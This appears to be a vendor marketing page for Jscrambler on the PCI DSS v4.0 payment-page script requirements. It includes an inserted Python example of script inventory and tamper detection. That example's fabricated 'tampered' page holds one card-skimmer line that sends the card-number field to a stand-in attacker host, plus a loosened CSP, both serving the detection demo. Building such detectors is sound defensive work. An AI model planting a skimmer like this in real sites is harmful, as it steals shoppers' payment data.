Comply with PCI DSS v4.0

Challenges

PCI DSS v4.0 contains two new requirements aimed at ensuring the integrity of payment pages on a website. Both are best practice until 31 March 2025 and mandatory after that date. However, it is vital that merchants gain visibility, risk management capabilities, and control of JavaScript before the standard requires it. Criminals are already skimming cardholder data from payment pages through injected or tampered scripts, and they are expected to increase the frequency and sophistication of these attacks before the new requirements are widely deployed throughout the payment ecosystem.

The first requirement (6.4.3) is designed to minimize the attack surface by managing every script that is loaded and executed in the consumer's browser on the payment page: each script must be authorized, its integrity must be assured, and it must appear in an inventory with a written justification for why it is necessary.

The second requirement (11.6.1) calls for a change- and tamper-detection mechanism that alerts personnel to unauthorized modification of the payment page as received by the consumer's browser, covering both the contents of its scripts and its security-impacting HTTP headers.

Solution

Jscrambler's solution allows easy, real-time visualization of any script that may threaten the integrity of the user's data, immediately flagging behaviors understood as undesirable or suspicious so that you can respond quickly.

List of all vendors and scripts running on the payment page with compliance status;

Script verification and authorization process as well as corresponding logs;

Records of the technical analysis of the functionality of each script and justification for it;

Validation of the integrity of the scripts with tamper-detection mechanisms and alerts;

Script behavior control and alerts on unauthorized modification of the contents of the payment page;

HTTP header change detection and alerts on unauthorized modification.
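To make the inventory, integrity and header-change items above concrete, here is an added example of how a baseline-and-diff check of the kind requirement 11.6.1 describes can be built. It is illustration code written for this page, not Jscrambler's product and not code from the original page. It inventories the scripts on a captured payment page (external scripts by src plus their SRI integrity attribute, inline scripts by the SHA-256 of their body) together with the security-impacting response headers, then diffs a later capture against the approved baseline. The HTML, headers, hostnames (`checkout.example`, `cdn.evil.example`), the placeholder SRI digest and the choice of which headers count as security-impacting are all constructed assumptions.

```python
# Added example, not Jscrambler's code: baseline-and-diff tamper detection for a
# payment page in the spirit of PCI DSS v4.0 req. 11.6.1. All HTML, headers,
# hostnames and digests below are constructed samples.
import hashlib
from html.parser import HTMLParser

# Headers treated as security-impacting; which ones matter is an assumption.
SECURITY_HEADERS = ("content-security-policy", "strict-transport-security", "x-frame-options")


class ScriptCollector(HTMLParser):
    """Collect <script> tags: external ones keyed 'src:<url>' (with their SRI
    integrity attribute), inline ones keyed 'inline#<n>' in document order
    (with the SHA-256 of their body)."""

    def __init__(self):
        super().__init__()
        self.scripts, self._n, self._buf = {}, 0, None  # _buf is None outside inline scripts

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        a = dict(attrs)
        if a.get("src"):
            self.scripts["src:" + a["src"]] = {"kind": "external", "integrity": a.get("integrity")}
        else:
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            digest = hashlib.sha256("".join(self._buf).strip().encode()).hexdigest()
            self.scripts[f"inline#{self._n}"] = {"kind": "inline", "sha256": digest}
            self._n, self._buf = self._n + 1, None


def capture(html, headers):
    """Inventory of a page as received by the browser: scripts plus the
    security-impacting headers. A reviewed capture becomes the approved baseline."""
    p = ScriptCollector()
    p.feed(html)
    hdrs = {k.lower(): v for k, v in headers.items() if k.lower() in SECURITY_HEADERS}
    return {"scripts": p.scripts, "headers": hdrs}


def detect_changes(baseline, current):
    """Diff a fresh capture against the baseline. Returns (severity, message)
    findings; an empty list means the page still matches what was approved."""
    findings = []
    b, c = baseline["scripts"], current["scripts"]
    for key in sorted(set(c) - set(b)):
        findings.append(("alert", f"script added that is not in the approved inventory: {key}"))
    for key in sorted(set(b) - set(c)):
        findings.append(("alert", f"approved script missing: {key}"))
    for key in sorted(set(b) & set(c)):
        if b[key] != c[key]:
            findings.append(("alert", f"script content or attributes changed: {key}"))
    # 6.4.3 asks for an integrity method; an external script with no SRI hash gets a warning.
    for key, desc in sorted(c.items()):
        if desc["kind"] == "external" and not desc["integrity"]:
            findings.append(("warn", f"external script without SRI integrity attribute: {key}"))
    bh, ch = baseline["headers"], current["headers"]
    for name in sorted(set(bh) | set(ch)):
        if bh.get(name) != ch.get(name):
            findings.append(("alert", f"security header changed: {name}: {bh.get(name)!r} -> {ch.get(name)!r}"))
    return findings


# Constructed samples: the approved page and a tampered copy with a dropped SRI
# attribute, an extra third-party script, a modified inline script and a loosened CSP.
BASELINE_HTML = """<html><head>
<script src="https://checkout.example/js/pay.js" integrity="sha384-PLACEHOLDERDIGEST"></script>
</head><body><input name="pan">
<script>window.dataLayer = [];</script>
</body></html>"""
BASELINE_HEADERS = {"Content-Security-Policy": "script-src 'self' https://checkout.example; connect-src 'self'",
                    "Strict-Transport-Security": "max-age=31536000"}
TAMPERED_HTML = """<html><head>
<script src="https://checkout.example/js/pay.js"></script>
<script src="https://cdn.evil.example/t.js"></script>
</head><body><input name="pan">
<script>window.dataLayer = []; new Image().src = "https://cdn.evil.example/c?" + document.querySelector("[name=pan]").value;</script>
</body></html>"""
TAMPERED_HEADERS = {"Content-Security-Policy": "script-src 'self' https://checkout.example https://cdn.evil.example; connect-src *",
                    "Strict-Transport-Security": "max-age=31536000"}


def run_demo():
    """Findings for the tampered page; an unchanged page yields none."""
    baseline = capture(BASELINE_HTML, BASELINE_HEADERS)
    assert detect_changes(baseline, baseline) == []
    return detect_changes(baseline, capture(TAMPERED_HTML, TAMPERED_HEADERS))


if __name__ == "__main__":
    for severity, message in run_demo():
        print(f"[{severity}] {message}")
```

Two caveats a practitioner should keep in mind with a check like this: the capture has to be taken as the consumer's browser receives the page (for example from a headless browser), not from the origin server, because content injected at a CDN, by a compromised third-party host, or by a script that loads further scripts at runtime never appears in the server-side HTML; and 11.6.1 expects the mechanism to run at least once every seven days, or at the frequency set by the entity's targeted risk analysis, so the diff must be scheduled rather than run once.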

Jscrambler's Solution Offers Superior Protection

Traditional security tools can't adequately address the new payment page requirements in PCI DSS v4.0. Unlike Jscrambler's solution, which is purpose-built, they lack flexibility, manageability, visibility, and control.

Vulnerability assessments only look at a point in time, and scripts are always changing;

WAFs inspect traffic between the browser and your servers; they can't see what scripts do inside the browser and won't prevent a script from sending data straight from the browser to a third-party domain;

Content Security Policy (CSP) has many gaps. For example, it can restrict where scripts are loaded from, but it doesn't control what an allowed script does once it executes in the browser, and it requires a lot of manual effort to configure and maintain;

None of them detect changes to existing first- and third-party scripts once the page is live.

Business Outcomes

Jscrambler helps you achieve compliance with the new requirements of PCI DSS v4.0. It provides you with visibility, risk management, and control of all JavaScript running on your website. The new requirements mandate that you maintain a full inventory of every script on your payment pages and validate the integrity of every script to ensure that those loaded into the consumer’s browser haven’t been tampered with. Jscrambler's solution goes one step further than the new requirements; it can be configured to automatically block all attempts to skim cardholder data from e-commerce transactions.

Preserve the functionality of the page and keep your e-commerce store open for business;

Create real-time alerts flagging changes to existing scripts;

Evaluate script changes to ensure they are not trying to steal cardholder data;

Reduce manual efforts required with traditional solutions;

Get audit-ready reports.

About Jscrambler

Jscrambler is a leading authority in client-side security software. We defend enterprises from revenue and reputational harm caused by accidental or intentional interference with first- and third-party code. Our solution works continuously, in real-time, keeping organizations protected regardless of how frequently code may change. Jscrambler’s customers include the FORTUNE 500, retailers, airlines, banks and other enterprises whose success depends on safely engaging with their customers online. We keep these interactions secure so businesses can continue to innovate without fear of damaging their revenue, reputation, or ability to comply with regulations.